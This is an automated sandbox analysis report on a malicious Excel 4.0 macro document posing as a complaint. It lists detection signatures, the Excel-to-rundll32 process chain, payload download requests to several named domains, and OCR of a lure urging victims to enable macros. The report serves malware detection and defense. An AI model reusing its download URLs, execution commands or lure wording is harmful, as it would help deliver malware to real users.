Loading ...

Play interactive tourEdit tour

Analysis Report Complaint-1992179913-02182021.xls

Overview

General Information

Sample Name:Complaint-1992179913-02182021.xls
Analysis ID:356738
MD5:b2c46df91cfe891f61af65277461b32b
SHA1:fd329e179663a40c31f5c567228a59349928a6a5
SHA256:3b9790a911cff3e1572608f3cc377a3776c63014c4230eebc46b0a220f22b1f5
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5256 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6772 cmdline: rundll32 ..\JDFR.hdfgr,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6808 cmdline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6836 cmdline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6884 cmdline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7000 cmdline: rundll32 ..\JDFR.hdfgr4,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Complaint-1992179913-02182021.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0xadf2:$e1: Enable Editing
  • 0xae3c:$e1: Enable Editing
  • 0x158cc:$e1: Enable Editing
  • 0x15916:$e1: Enable Editing
  • 0x20083:$e1: Enable Editing
  • 0x200cd:$e1: Enable Editing
  • 0xae5a:$e2: Enable Content
  • 0x15934:$e2: Enable Content
  • 0x200eb:$e2: Enable Content
Complaint-1992179913-02182021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5256, ProcessCommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, ProcessId: 6772

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domainShow sources
    Source: http://pathinanchilearthmovers.com/eznwcdhx/44250666589120400000.datAvira URL Cloud: Label: malware

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.3:49722 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
    Source: global trafficDNS query: name: rzminc.com
    Source: global trafficTCP traffic: 192.168.2.3:49722 -> 138.36.237.100:443
    Source: global trafficTCP traffic: 192.168.2.3:49717 -> 72.52.227.180:80
    Source: Joe Sandbox ViewIP Address: 162.241.80.6 162.241.80.6
    Source: Joe Sandbox ViewIP Address: 138.36.237.100 138.36.237.100
    Source: Joe Sandbox ViewIP Address: 91.199.212.52 91.199.212.52
    Source: Joe Sandbox ViewIP Address: 91.199.212.52 91.199.212.52
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: GET /xklyulyijvn/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /eznwcdhx/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pathinanchilearthmovers.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xjzpfwc/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jugueterialatorre.com.arConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /fdzgprclatqo/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xklyulyijvn/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /eznwcdhx/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pathinanchilearthmovers.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xjzpfwc/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jugueterialatorre.com.arConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /SectigoRSADomainValidationSecureServerCA.crt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: crt.sectigo.com
    Source: global trafficHTTP traffic detected: GET /fdzgprclatqo/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rzminc.comConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: rzminc.com
    Source: 30D802E0E248FEE17AAF4A62594CC75A.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://api.cortana.ai
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://api.office.net
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://api.onedrive.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://augloop.office.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://cdn.entity.
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://cortana.ai
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://cortana.ai/api
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://cr.office.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://directory.services.
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://graph.windows.net
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://graph.windows.net/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://login.windows.local
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://management.azure.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://management.azure.com/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://messaging.office.com/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://officeapps.live.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://onedrive.live.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://outlook.office.com/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://settings.outlook.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://tasks.office.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownHTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.3:49722 version: TLS 1.2

    System Summary:

    barindex
    Found malicious Excel 4.0 MacroShow sources
    Source: Complaint-1992179913-02182021.xlsInitial sample: urlmon
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 8Screenshot OCR: Enable Editing, please clic x 14_ from the yellow bar above ok 15 DFR,hdfgr4 16 I : I \.Oj Th
    Source: Screenshot number: 12Screenshot OCR: Enable Editing, please click The specified module could not befound. 14_ from the yellow bar above
    Source: Screenshot number: 16Screenshot OCR: Enable Editing, please click Enable Content 14_ from the yellow bar above 15 O G) 16 17 ,, WHY
    Source: Screenshot number: 16Screenshot OCR: Enable Content 14_ from the yellow bar above 15 O G) 16 17 ,, WHY I CANNOT OPEN THIS DOCUMENT?
    Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
    Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
